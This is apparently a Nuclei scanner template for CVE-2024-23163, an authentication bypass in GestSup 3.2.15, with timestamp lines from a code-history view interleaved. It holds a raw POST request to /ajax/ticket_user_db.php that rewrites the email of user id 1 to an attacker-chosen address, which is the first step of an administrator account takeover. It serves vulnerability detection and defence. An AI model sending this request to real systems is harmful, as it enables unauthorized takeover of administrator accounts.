2024-08-07 12:59:21 +00:00
id : CVE-2024-23163
info :
2024-08-29 04:30:52 +00:00
name : GestSup - Account Takeover
author : eeche,chae1xx1os,persona-twotwo,soonghee2,gy741
2024-08-07 12:59:21 +00:00
severity : Critical
impact : |
2024-08-29 04:30:52 +00:00
An attacker could bypass the authentication process and access the application as an administrator user by modifying the usermail field to a controlled email address and requesting a password reset.
2024-08-07 12:59:21 +00:00
remediation :
2024-08-29 04:30:52 +00:00
Apply necessary security patches or updates provided by the vendor to secure the ticket_user_db.php endpoint and ensure proper authentication checks are in place.
2024-08-07 12:59:21 +00:00
reference :
2024-08-29 04:30:52 +00:00
- https://www.synacktiv.com/advisories/multiple-vulnerabilities-on-gestsup-3244
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23163
- https://doc.gestsup.fr/install/
2024-08-07 12:59:21 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2024-23163
cwe-id : CWE-287
metadata :
max-request : 2
2024-08-29 04:30:52 +00:00
verified : true
fofa-query : title="GestSup"
2024-08-07 12:59:21 +00:00
vendor : gestsup
2024-08-29 04:30:52 +00:00
product : gestsup ver 3.2.15
tags : cve2024,cve,account-takeover
2024-08-07 12:59:21 +00:00
2024-08-29 04:30:52 +00:00
variables :
name : '{{rand_base(6)}}'
2024-08-07 12:59:21 +00:00
2024-08-29 04:30:52 +00:00
http :
- raw :
2024-08-07 12:59:21 +00:00
- |
POST /ajax/ticket_user_db.php HTTP/1.1
Host : {{Hostname}}
X-Requested-With : xmlhttprequest
Content-Type : application/x-www-form-urlencoded
2024-08-29 04:30:52 +00:00
modifyuser=1&lastname={{name}}&firstname={{name}}&phone=&mobile=&mail={{name}}@test.com&company=111&id=1
2024-08-07 12:59:21 +00:00
2024-08-29 04:30:52 +00:00
matchers-condition : and
2024-08-07 12:59:21 +00:00
matchers :
- type : word
2024-08-29 04:30:52 +00:00
part : body
words :
- '{"status":"success'
- 'firstname":"{{name}}","lastname":"{{name}}'
condition : and
- type : word
part : header
2024-08-07 12:59:21 +00:00
words :
2024-08-29 04:30:52 +00:00
- 'text/html'